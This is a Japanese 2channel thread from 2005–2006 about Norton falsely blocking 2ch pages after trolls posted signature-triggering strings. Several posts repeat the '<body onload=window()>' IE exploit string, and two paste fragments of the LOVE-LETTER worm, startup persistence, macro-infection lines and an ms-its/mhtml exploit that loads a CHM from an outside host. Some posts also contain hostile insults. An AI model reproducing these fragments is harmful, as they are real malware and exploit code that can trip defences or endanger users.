442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0(1)
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?

448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす

449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。

私も、そう思っていたり。
0491動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 23:49:34ID:BF/Q6J/m0
>>488
誤作動するのは2chだけか?

>>489
代わりは? マックか? リナか? トロンか?

OS換えるよりFW交換の方が安くて早い。
選択肢もOSより多い。

なにより
「ゲイツさん、ノートンが誤作動します。OS代金返して」
「ノートンに言え。他のソフトじゃ誤作動しない。」
で終了。
0492動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/01(木) 23:58:45ID:UY8lxahn0
>>486
えーと、言葉足らずだったかな
めんどくせーのは、検出されるたびにそのIPを信頼リストに入れるのが、ってこと
(ま、2chすべて信頼済みにすればいいんだろけど)
実動作しない単に貼られた文字列に反応するノートン先生もトンチキだけど、
そもそもそういうのを貼るのが困ったもんだわ('A`)
0498動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 11:12:45ID:cheTjBMl0
181 ◆Reffiz2Zh. sage 2005/11/28(月) 11:34:22 ID:BlBjwc9/0
>178
新手のノートントラップです。
ここじゃ、明かせないのでメールにて説明しますね。
186 ◆MUMUMUhnYI sage 2005/11/28(月) 11:51:32 ID:/3xX5FyA0
>>181
メール届きました。
ううむ。なんだかなぁ。
188 ◆MUMUMUhnYI sage 2005/11/28(月) 11:52:48 ID:/3xX5FyA0
とりあえず、問題の本質は理解したです。
ノートントラップというか、問題はもっと根が深いかんじですね。
公開情報ではありますが、確かに現段階では、ここに書くのははばかられるです。
194 ◆MUMUMUhnYI sage 2005/11/28(月) 11:56:51 ID:/3xX5FyA0
ひとことだけ。
「ノートンから除外した場合(というか一般的に当然ですが)には、
不審なリンクは不用意にクリックしない」
とゆうことで。


・・・なんか裏で極秘プロジェクトでも進んでるの?
0499動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 11:32:13ID:CS5/4izN0
>>498
公開の場に詳しく書くと、見る人が見た時悪用できるって事だと思う。
最後のは「ノートンの防御機能を無効にしたらユーザーが気をつける」
むむむさんが書いてる通り当然のこと。
ってかノートン入れてても怪しいリンクを安易に踏まないのは基本。
0500大空寺あゆ親衛隊 HELVA ◆THYOQYTAXA
垢版 |
2005/12/02(金) 11:46:51ID:ha+3nG/10
ウチも2ちゃんねるをおうえんしています
0501動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 13:07:35ID:cnBkrw7B0
もう落ち着いたのか?
0503動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 13:34:57ID:NVBOvwGY0
侵入防止のHTTP MSIE javaScript OnLoad Rte CodeExecに
更に細かく除外するコンピュータの設定がついてれば今より少しは安心出来るのに
まあそこまで細かくしすぎると管理し辛いか
0504動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 14:52:00ID:8ba/exXp0
昨日からノートン入れた者なのですが
ニュー速のスレを開いたら何者かが侵入を試みたので防ぎましたみたいなのが
出てそれからΝ速、+、共に見れなくなりました・・・
0510動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 20:42:10ID:IHq1xYI10
<body onload=window()>
テスト
0511動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 22:05:12ID:h5gB50Dy0
>>510
氏ね。
0512動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/02(金) 22:07:34ID:6e6XLCLy0
>>511
<body onload=window()>
0513動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 00:55:30ID:r4GdU0C10
あぼーん
0514動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 10:44:32ID:F4mYTX8O0
これが原因だったのか!!!
0515動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 10:55:30ID:5PagNx8c0
今は間カフィのほうのPCでアクセスしてるからこのスレがちゃんと見えるけど、
野トンだと>>509以降の表示がぶっ壊れるよ
なにやってんだかな、野トン先生orz
0516シラネーヨ
垢版 |
2005/12/03(土) 11:15:23ID:H4hlwyNK0
シラネーヨ
0517動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 20:13:14ID:xBom7gmX0
どれどれ。実験。

c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub
0518動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/03(土) 20:49:29ID:3AOyRztk0
      ∬
      酒 (´д`)  < 俺、知ってるよ…。
     ========  \
   /※※※※ゞノ ,_)
  ~~~~~~~~~~~~~~~~
0521動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/04(日) 04:28:24ID:X+Ww/b+O0
>>510
氏ね

>>512
お前も氏ね

>>517
お前は氏ねじゃなくて死ね!
0522動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/04(日) 04:37:08ID:h85ucp1x0
かきこむ
0523動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/04(日) 12:26:49ID:50GK9X4n0
英語ばかりで読めないな。
0524http://h.pic.to/30ayt
垢版 |
2005/12/04(日) 12:37:37ID:EpZg83SWO
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub
0529動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/05(月) 17:48:16ID:5iffv5U70
ホントに無問題なのか!?
確かに反応はしなくなるが、それを逆手に利用しLogフォルダを狙ってくるかもと妄想してみる
まだじゃまくさいが*.dat毎に設定した方が…
0540動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/07(水) 22:38:17ID:p1e7f/VT0
ノートンの
侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExec
のチェックはずして、
オミトロンの
Onload Unloader
をオンにスルだけで解決するんだが。

何をそんなに騒ぐ。
0542動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/08(木) 01:43:07ID:J0d2TFmr0
専ブラはdatしか読みに行かないから、ノートンのチェック外しても
何ら問題は無い。

問題はIEの味噌も糞も一緒くたにとっとくテンポラリフォルダだ。
これもブラウザ閉じた時にキャッシュを削除する設定にしておけば
多少は安心だろう。
0544動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/10(土) 21:42:55ID:L+GgO2q30
いきなりフジ実況見れなくなった。。。
まとめサイトの対策してるのに
0549動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/12(月) 23:00:52ID:6AEQSNlY0
<body onload=あwindow()> ms-its:あmhtml:file://c:\

誤作動うぜぇー
0550動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 00:03:08ID:EccYzO0u0
0555動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 01:15:55ID:ct+jZ+de0
ノートンの信頼ゾーンから例のアドレス群を削除してもまったく問題なし。
どうやらこの前のupdateで、Symantecが対応したようだ。
まあ、定義ファイルちょこっといじるだけだしね。
0559動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 07:12:17ID:yYTaEYqU0
2006でアップデートしてみた
何故か専用ブラウザ(JaneDoeView)だと問題なくなったけど
IEで見ると以前と同じように侵入防止される
0561動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 13:26:01ID:Mc0lYOUq0
2chブラウザを使ってると、ログの再取得をしないから、反応しないだけ。
ログを一旦消して、誤爆文字列を再読み込みさせると遮断されるよw
0562動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 16:33:49ID:Fiu/blpC0
ん?
2005+かちゅだけど、ログ消して再取得してもまったく問題ないよ。
確かこのスレにもコード張ってあったよね。
該当スレ削除されてるのかな?
数日前から信頼ゾーン元に戻してあちこち見てるけど、一度も遮断は起きてない。
0570動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 21:21:25ID:qGOg/NGt0
今日2006インスコ→LiveUpdateした後
JaneDoeStyleでこのスレ開いてみたけど大丈夫でした。
(もちろん、ログ再所得済)
ただし>>559同様、IEはダメ。
一度IEで開くと、その後はJaneでもダメ。

0572動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/13(火) 21:39:18ID:mvJZvZGa0
2ch側で何か対策した?
専用ブラウザでの閲覧は現在問題無しみたいだ。
もちろんログ消去をやった上で。
少なくても日曜日の段階では、自分も専用ブラウザの閲覧でトラップに引っ掛かっていた。


317 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:25:00
2005は直ってないの?直ってたら乗り換えようと思ってるんだけど

318 名前:名無しさん@お腹いっぱい。 [] 投稿日:2005/12/11(日) 14:50:13
2006が直った言うのはマジですか?

319 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:58:53
2006直ってないよ。
シグネチャ更新しても、問題のヤツはそのまま残ってて、いきなり遮断されたしw
プログラム本体の更新が無い限り直らんでしょ?これ。
ホントに直った人いるの?

320 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:00:33
また工作員の虚言か!

321 名前:297 [sage] 投稿日:2005/12/11(日) 15:00:54
ありがとう。
やってみるよ。

322 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:27:18
あれ・・・DL板で更新したら問題なく更新されたんで直ったと思ったが何回かやってると遮断してるな・・@2004
なんじゃこりゃ


で、IEによる閲覧では現在も遮断される事から、最新のアップデートでもノートントラップが対応出来ていないのは明らか。
どーなってんの???
0577570
垢版 |
2005/12/14(水) 13:38:58ID:065kioyb0
>>573
Updateしてみましたが、やはりIEでは遮断されました。
0578動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 15:21:30ID:B2e/IoHz0
工作員ウザ杉

本気で売買契約解消しようと思うんだが、
誰かシマンテックと交渉した奴いる?

これはOSのせいじゃなく「ノートンのFWだけ」の誤作動だから
返品できるよな? 交渉は小売とした方が良いのか?
0579動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 15:21:38ID:lH3ozVBK0
2006で、ここのログを取得してみた。(専ブラはログを破棄して再取得)
専ブラ(Live2ch、かちゅ)では遮断されなかった。
普通のブラウザ(IE、Opera)だと遮断された。
うーん、不思議。
0581動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 15:57:29ID:B2e/IoHz0
>>580
プ 工作員必死だなw

都合が悪いレスを煽って誤魔化すってことは
やっぱり返品出来るんだなw

そりゃそうだ他社のFWじゃ誤作動しなくて
ノートンだけ誤作動じゃ言い訳できないもんな。

工作員の必死さから良く分かった。
返品の話が都合悪いの?w んー?w 悪いの?w
0582動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 16:01:29ID:lfvSkMHa0
誤作動ではなく危険なコードは完全に弾く仕様になっております。
もし、信用できるサイトの観覧に不都合が生じた場合は
そのサイトを信頼ゾーンに追加して下さい。

と。
0583動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 16:09:17ID:B2e/IoHz0
>>580
>サイトの観覧に不都合が生じた場合は
>そのサイトを信頼ゾーンに追加して下さい。

いやだ。

信用できるかどうか分からんからFW入れてんだよ。

それに今回は

「サイトの観覧に不都合が生じた場合は〜」 じゃねーだろ?
「FWのコード識別に不具合が生じてる」

「不都合」でなく「誤作動」
0584動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 16:27:23ID:lfvSkMHa0
>>583
お客様、何度も申し上げますが誤作動ではなく仕様です。
なにとぞ御理解下さい。

分かりやすく説明するとこうなる↓

ハァ?どーでもいい一般ユーザーは黙ってろっての!
グチグチうるせーな。
スキル無いボケが生意気いってんじゃねーよ!!

返金?返品?シラネーヨ!

嫌なら裁判でも起こせばいいだろー
知識の無い裁判官言いくるめる弁護士雇う金がこっちにはあるんだボケ!!
ネットで吠えてねーでやってみろ根性なしが(ププp
0587動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 17:01:46ID:JiKINitk0
>>586
一応コピペ

>「不適切な Document Object Model オブジェクトのメモリ破損の脆弱性」は、
>JavaScriptでwindow()イベントが使われた場合に任意のコードが実行されるというもの。
>ネット上では5月にすでに情報が公開され、この脆弱性を悪用するトロイの木馬も登場しており、
>ユーザーは至急パッチを適用すべきだ。
0590動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 18:31:24ID:zKLyALpC0
俺漏れも
0591動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/14(水) 18:45:29ID:a5x2HY3T0
いや先生もう対策しちゃってるしね
この悪戯もいずれ下火になると思うので、もう設定で対処しないで
引っ掛かったら一時的に切って遮断解除、が一番安全だとは思うけどね

ただ、例えて言えば、ノートン先生って
子供が男子高校生なのに、痴漢がどうのとかいって塾の送り迎えしたり
二十歳超えたのに、夜は危ないから8時以降は外出するのは控えなさい、
とかいうオカンなんだよなw
五月蠅い事この上ない

>>586,587
thx
0602動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/15(木) 07:07:26ID:/Hth94uT0
んで先日のMSのアップデートしたらシグネチャ除外でHTTP MSIE JavaSvript〜
っての切っても問題ないの?
これってMSのバグの脆弱性を埋めるためだけのやつだよね?
0604動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/15(木) 10:48:51ID:0IKFE+YG0
Windows UpdateとノートンのUpdate済ませて
それ以前にブロックされてたスレが普通に読み込めたので
シマが対応したと思ったのだが、やはりスレによっては、
ブロックされるようです。
まんどくさいなー、悪戯やめれ!
0606動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/18(日) 18:04:47ID:/Gl1/UV+0
MSがセキュリティホール埋めたけどシマンテックはこのHTTP MSIE JavaScript〜
に関する文字列の検知を変更しないわけね?じゃあシグネチャ除外が一番かなあ…
個人的にはどうせIEほとんど使わんし、どこぞの反日クラッカーに2ちゃん鯖クラックされる
リスクの方が怖いや。
0607動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/18(日) 19:25:41ID:JVV9/DvK0
ログ削除して専ブラ使えば良い、なんて書きこみがあるけど、>>570,>>579など。
これってシマンテックの社員なの?

専ブラ使っても相変わらず駄目だよ。
悪質な嘘をつかないでくれるかな。
マジでムカついちゃったよ。
0608動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/18(日) 19:36:09ID:RN6yyh6F0
ノートン2006 + JaneDoe View α ( build date: 051128 )
でログ取得し直しても問題なく使えてるけど?
馬鹿みたいな事書き込んでないで先ず自分の環境くらい書こうよ
0610動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/18(日) 21:05:53ID:aV+RNAht0
ログ取得し直しても問題なしって人は設定が間違っているか
無意識に警告が出ない設定にしてあるって事に早く気がついたほうがいいよ。
解らなくて警告が出ないより、解ってて解除する方がいいからね。
0611動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/18(日) 23:56:35ID:QUwDeAJW0
NIS2006 + twintail v2.0 beta36 + Windows 2000 SP4 + MSの対策パッチ

NIS2006の「HTTP MSIE JavaScript Onload〜」の侵入防止シグネチャ有効。
そのシグネチャのプロパティーで、検出時に警告を出すように設定している。
Twintailのキャッシュをフォルダ毎削除して、このスレを読み込んでも反応無し。
そのあと、IEでこのスレを開くと遮断される。
遮断されたIPを解除し、Twintailのログを削除して、再読み込みしても反応無し。
そのあと、IEでこのスレを開くと再び遮断される。

このような症状になってる人が他にも居ると思うが、マジで原因が判らんよ…
0612動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/19(月) 07:31:36ID:9dyvKkJ30
>>610
2ch専ブラで問題なしIEで問題ありって人が実際多数いるんだし
俺もJaneDoeView最新版で問題なし
お前みたいな訳分からない否定をするやつは何故自分の環境を書いたり試したりしないんだ?
0614動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/19(月) 07:40:57ID:9dyvKkJ30
>>613
OnloadのやつはIE特有のバグらしいからIEコンポーネント系以外は反応しないように
対策したかも知れないとか考えられないの?
とりあえず変な事ぼやいてないで何か否定材料出してよ、検証しようがないから
0615動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/19(月) 08:00:45ID:9dyvKkJ30
自己レス
FireFoxってのを入れて試してみたけどこっちでも反応したな
単純にIE、非IEで分けている訳では無いみたいだ
0619動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/19(月) 13:15:13ID:FcoWUZ/m0
USER_AGENTをIE以外に偽装してIEでアクセスしたりとか試してみたが、関係無いみたいだ。
もしかしたら、どこかで陰険なチェックが入ってないかと疑ってみたんだがw
0623動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/21(水) 00:08:12ID:B+zRECi40
釣りばっかでツマンネage
0627動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/22(木) 18:35:25ID:Bq8BcPJ00
スマンテクの対策は終わったみたいだが、対策前にこれが保存できなかったが、バスターで一度読んだ後
対策前のノートンで読んだら問題なかった。不思議?
0632動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/23(金) 13:51:50ID:GpdCCnv00
XPとMeを持っているんですけど一つで二つのパソコンに2006をインストール出来るんですかね?
0636大空寺あゆ親衛隊 HELVA™ ◆THYOQYTAXA
垢版 |
2005/12/24(土) 12:16:36ID:mMuLRaUt0
ごきげんよう
0638動け動けウゴウゴ2ちゃんねる
垢版 |
2005/12/24(土) 16:48:18ID:YRnZj93J0
2006買って、ユーザー登録した?
0645動け動けウゴウゴ2ちゃんねる
垢版 |
2006/01/08(日) 04:36:52ID:tvVNim+i0
>>643
なんだ、奴はVIPPERだったのか。時々実況邪魔しにくるのがウザいと思ってたが。
何れにせよヒッキーネカマにゃ死んでもらいたいな。
0649動け動けウゴウゴ2ちゃんねる
垢版 |
2006/01/11(水) 13:27:16ID:ZIduVsA/0
あのー、>>13やっても誤作動するんですが・・・
0650動け動けウゴウゴ2ちゃんねる
垢版 |
2006/01/11(水) 14:31:09ID:rF6m2+kr0
さらに変なことになってすべてのサイトにアクセスできなくなったからファイヤーウォール設定低レベルにした・・・
もうむちゃむちゃだ・・・
0655動け動けウゴウゴ2ちゃんねる
垢版 |
2006/02/12(日) 04:27:29ID:Mo3IeAmZ0
また見れなくなってきたんだが
追加IP誰かおせーて
0657動け動けウゴウゴ2ちゃんねる
垢版 |
2006/02/12(日) 04:48:16ID:O9Ac1mU90
>>655
拾ってきたけど必要なのは一番下だけかな。
そのうち詳しい人が出てくると思う。

(新規追加)
+live22y.2ch.net:206.223.150.64
+live22y.2ch.net:206.223.150.74
+live22y.2ch.net:206.223.150.84

+same.u.la:206.223.157.12
+chirasi.u.la:206.223.157.17
+bbm.u.la:206.223.157.32

+stock.2ch.net:206.223.150.250
0658動け動けウゴウゴ2ちゃんねる
垢版 |
2006/02/17(金) 09:34:24ID:Kvo6yfmj0
Bloodhound.Exploit.6

これなんですか?2チャンネル見てたらどんどん出てきます。
0659七誌
垢版 |
2006/02/17(金) 09:53:09ID:BU1Oq8bJ0
AVG free soft は使って問題起こさないの 誰か教えて
0661動け動けウゴウゴ2ちゃんねる
垢版 |
2006/02/20(月) 00:28:42ID:LP76sHaV0
ごめんなさい ノートンユーザーです
普通に見れていましたが、ウイルス検知が作動して
ラブレターやらいろいろ拾います。いろいろといっても
3回ほどですが、、、orz
0663xiaoran
垢版 |
2006/02/21(火) 17:27:48ID:OGGj0h600
テスト
0664動け動けウゴウゴ2ちゃんねる
垢版 |
2006/02/21(火) 19:11:33ID:0olRMpED0
Jane Doe Styleをアップデートしたら2ch読み込まなくなった。
>>652を設定しなおしてもダメ。
どうすりゃいいの?教えてエロイ人。
0670動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/05(日) 15:55:12ID:2eBGyQVL0
http://life7.2ch.net/test/read.cgi/intro/1140623959/688

誰かがこれを貼ったらノートンが反応するようになった
ただ、警告が出るだけなのでそれほど深刻な被害にはなってないのだが、
(いろんなスレで見かけるし)問題は、こういう知識をどこで得るのかこいつらは。
そして、どういうつもりで、なにが楽しくてこんなことやってるのか。
こういうことして喜んでるキモい奴が日本のどこかで普通に生活してるというだけで気持ち悪くて吐きそうなんで
みつけだして死刑にしてもらえませんか?
0673動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/05(日) 17:42:34ID:zrWtNUWY0
HTTP MSIE JavaScript OnLoad Rte CodeExec
っていうのもノートンの誤検出?
0675動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/05(日) 17:49:03ID:f/e310UY0
つかスレを最初から読んで情報を得るという発想がなくて
聞きたいことだけその場で聞くなんて奴は掲示板使うな
0676動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/05(日) 19:06:24ID:7N1M/Z6g0
>>674>>675
見ようとしたらノートンが作動して見れなくなるんですが・・・
0678動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/05(日) 19:18:46ID:1Tu1qzgQ0
確認の時くらいはノートン切る勇気もてよ
2chログから本物のウイルスなんて出てくるわけないし
それができないなら2ch利用を諦めるんだな
0679動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/05(日) 19:28:10ID:7N1M/Z6g0
>>678
ファイアウォールを切れって事?
0683動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/15(水) 18:22:32ID:24ArEtL20
206.223.150.96ってどこの板?
0685動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/17(金) 23:23:18ID:3VZwdPLg0
>>680
どうやって?
0687動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/18(土) 16:20:55ID:nf0sC/Rq0
ノートンアンチウィルス2006のFW無し版でワーム検出で
HTTP MSIE JavaScript OnLoad Rte CodeExec に
引っかかるのはどーしtらいいんだべ?
0689動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/18(土) 16:36:28ID:nf0sC/Rq0
だめIPじたいで弾かれる、ちなみにセキュリティ板。
信頼ゾーンの設定ないから、HTTP MSIE JavaScript OnLoad Rte CodeExec
じたいを除外してる。
0691動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>>657が最新?live22xでまだ誤作動するんだけど
0695動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/20(月) 20:12:08ID:D12Sn3WM0
同じコード貼られてんのに反応する時としない時がある・・・
ノートンさんは気まぐれなのか?
0697http:// p5028-ipad04takakise.saga.ocn.ne.jprlo.LBBS.net/
垢版 |
2006/03/21(火) 12:21:10ID:K+B9O+Ji0
loliloli
0698動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/22(水) 02:52:27ID:w4BbNhMT0
どうやら最近のAutoUpdateで、NISだけでなくNAVもHTTP MSIE JavaScript OnLoad
Rte CodeExecにひっかかるようになったらしい。
NAVではIP除外の設定ができないので、ハマっている人が多いっぽい。
OpenJaneでは特定のキーワードをあぼ〜んすることで回避できるが、
ギコナビだと出来ないらしい。
間違ってるかもしれないが、参考までに。
0699動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/22(水) 07:22:41ID:hrzFkAdI0
私は

一時的にノーd先生の「インターネットワーム防止」を寝かせる

ログを取得

ノーd先生を起こす

ゆっくりとログを読む

で対応してるけど・・・
この方法を編み出すまでに3時間ぐらいハマッた。
0702動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/22(水) 17:43:28ID:w4BbNhMT0
一応書いておいた方がいいかな。OpenJaneにて以下の手順で回避確認。
間違ってたらツッコミよろ。

○NAVを使っていて"このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad
Rte CodeExec」 の試みを検出して遮断しました。"というメッセージが出て、
2chに30分間アクセスできなくなった時の対処方法(とりあえず)

1.NAVのオプション→インターネットワーム防止→「除外の設定」で、
「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックをはずす
2.「AutoBlockルール」で、2chへの遮断を解除
3.スレを開いてログを取得する
4.専用ブラウザのあぼ〜ん設定で、NGWORDなどを使って、当該レスを表示しないようにする
5.手順1ではずした「除外の設定」のチェックを元に戻しておくのを忘れない
0703動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/22(水) 19:04:03ID:ymCvr6qY0
ノートンの2002はマダ使えるノー。
0704動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/23(木) 04:48:52ID:knzg2z2B0
>>701
ついでにウイルスコードもまとめてあぼ〜ん指定したら
NGワードファイルがノートン先生に吹っ飛ばされますた。
俺バカス(´・ω・`)
0705動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/23(木) 13:53:00ID:anluZr460
これにやられたのかな?
0706ああああああああああああ
垢版 |
2006/03/23(木) 14:13:34ID:8snwN8ut0

キタ━━ <body onload=window()> ━━━ !!
0708動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/23(木) 20:56:17ID:yEL+otgn0
今日から仲間入りしましたNAV2006です。
0712動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 09:07:22ID:i9GBvAYP0
>>711
だよねえ。
上の方に「あぼ〜んで対処できた」って書いてあったから試してみたけど、
通信の時点で遮断しちゃうんだからローカルあぼ〜んじゃ
どうにもならないよね。
0718動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 18:10:05ID:y5S9pPbQ0
このスレもウイルスがいるようだ。
ノートンが2度発動。しかも最新50で
0720動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 21:22:57ID:hZPlzV+H0
誤作動に当たるのかわからんが、ノートン2005入れてて
今まで特に問題も無かったが最近エクセル開こうとしたら
「ウイルスチェックを開始します…」といって全く開けなくなった。
コレはどういうことなんですかね?解決策とかありますか?
0723動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 22:40:08ID:AY5Wzasy0
ここは2chのスレを見たらノートンが誤作動する人のスレです
2ch絡みでない誤作動の面倒を見るスレではありません

エクセルでの誤作動報告は当局に対して行ってください
0726動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 15:57:37ID:BZxZKTBW0
>>725
そうなんだよ、それが見つからなくて困ってここに来たよ。
0727動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 16:24:59ID:pwaEyKGo0
>>726
参考までに・・・ただし、自己責任で

ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996

> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、

> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。

> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、

> 遮断解除してok。で、ok。
0729cen ◆Am9xOgNMYE
垢版 |
2006/03/26(日) 17:19:42ID:Y3ON9q4k0
NAVの場合、こういう方法もあります。onload〜の場合のみ。

1.スレッドを見ると
「「HTTP MSIE Java Script OnLoad Ret CodeExec」の試みを検出して遮断しました。」
という反応をする。

2.Norton AntiVirusのオプションを開いて、インターネットワーム防止を選択、
AutoBlockルールのリストから先程のIPアドレスを消して、閉じる。
インターネットワーム防止をオンにするのチェックを外して無効にする。

3.スレッドを再取得

4.http://www.geocities.jp/cen_hp/program3.html を使って無効化

5.インターネットワーム防止をオンにするのチェックをして有効にする。
0730動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:08:48ID:40HZ683F0
>>727
ν速だけ繋がらないから鯖落ちしてんのかと思った
おかげで助かりました
ありがとう
0731動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:27:00ID:iC6tWHU/0
馬鹿コードをはれないように2ちゃんのほうでなんとかならないものかな?
うっとうしくってしかたない。
0734動け動けウゴウゴ2ちゃんねる
垢版 |
